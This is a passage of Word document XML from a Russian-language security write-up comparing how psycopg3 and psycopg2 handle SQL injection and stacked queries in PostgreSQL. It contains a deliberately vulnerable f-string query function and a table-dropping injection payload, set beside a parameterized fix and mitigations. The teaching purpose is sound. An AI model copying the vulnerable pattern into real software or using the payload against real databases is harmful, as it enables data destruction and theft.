    <w:p w14:paraId="451E21BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   libpq docs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexecParams</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/libpq-exec.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30013A22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R20 (sources/research.md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A200876" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5.2 psycopg3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F17619" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> psycopg3 (актуальная ветка 3.2.x) — переписанный с нуля драйвер, основан на libpq, но поддерживает оба протокола wire. Логика выбора: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cur.execute(sql, params)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>extended protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Parse/Bind/Execute), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cur.execute(sql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без params → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">server-side </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bindings, но multi-statement поддерживаются через text path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (результаты доступны через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cursor.nextset()</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cursor.results()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Также есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prepare_threshold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (по умолчанию 5) — после стольких исполнений запрос автоматически становится server-side prepared statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C981D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78747443" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import psycopg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269D257A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B38BF7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn = psycopg.connect(dsn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D69FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cur = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7A7B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D9CFAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def search_users(name: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A010288" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(f"SELECT id, email FROM users WHERE name = '{name}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CAD75A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return cur.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B4572A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в f-string. Параметры в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не передаются — psycopg3 уходит через text-path, который пропускает multi-statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8093F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB93CED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def search_users(name: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6333FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute("SELECT id, email FROM users WHERE name = %s", (name,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CDDC9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return cur.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894F788" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Параметр передан вторым аргументом — psycopg3 формирует Parse-сообщение с одной командой и Bind-сообщение со значением. Значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> едет в отдельном сообщении wire, не смешивается с SQL-токенами на стороне клиента вообще.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8F259" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A6274A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Единый payload, два пути:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753DE52C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `name`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628DB807"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71D9C5DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Путь 1: simple/text-path (уязвимый код, без params).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A88FA57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F8BF0A"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78C59787" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL парсит как два statement-а, оба исполняются. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cur.fetchall()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вернёт результат первого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (psycopg3 в отличие от psycopg2 сохраняет каждый result в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nextset()</w:t>
      </w:r>
      <w:r>
        <w:t>-цепочке — оба доступны).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F531F63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Путь 2: extended (безопасный код, с params).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E7F0DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер отвечает (на этапе Parse, до Bind/Execute):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FDDDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если разработчик случайно передал склеенную строку как первый аргумент (без params) — поведение как в пути 1. Если правильно: значение payload едет как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bind</w:t>
      </w:r>
      <w:r>
        <w:t>-аргумент:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BF8576" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parse:   SELECT id, email FROM users WHERE name = $1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6FC45A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bind:    $1 = 'x''; DROP TABLE users; --'   (длина 25 байт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CC8B48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execute: возвращает 0 строк</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20083A26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри значения параметра не парсится PostgreSQL — это просто байты в текстовом значении. Стакинга нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB9A58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если же разработчик попытается передать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри SQL-текста с одновременным наличием params:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304D1A4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cur.execute("SELECT 1; DROP TABLE users", ())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F6F163" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54972EA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E534F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Parse отклонит строку с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между значимыми токенами ещё до Bind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622D3347" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что отличает psycopg3 от psycopg2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B15254C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>С params</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: psycopg3 уходит в настоящий extended-protocol с раздельными Parse/Bind. Безопасность гарантирована тем, что значения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>никогда не смешиваются с SQL-токенами</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на клиенте — нет mogrify, нет экранирования. Это сильнее, чем psycopg2: даже принципиально плохое экранирование (которого в psycopg2 нет, но в самописных адаптерах могло быть) тут отсутствует как стадия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7544D422" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Без params</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: psycopg3 уязвим как psycopg2, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>видны оба результата</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cur.nextset()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стакинг легче обнаружить в логах приложения (psycopg2 показывает только последний result).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B228C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>executemany()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в psycopg3 формирует серию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execute</w:t>
      </w:r>
      <w:r>
        <w:t>-сообщений на одну Parse — стакинг блокирован на каждой итерации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B93AFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Server-side prepared statements (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prepare_threshold</w:t>
      </w:r>
      <w:r>
        <w:t>) гарантируют extended-path после нескольких исполнений; первые N исполнений идут как «unnamed prepared» — тоже extended, тоже блокируют стакинг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D18C590" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigations специфичные для драйвера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60145B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cur.execute(sql, params)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-placeholder, никогда f-string / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>-форматирование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F9C83D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Для динамических identifiers — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
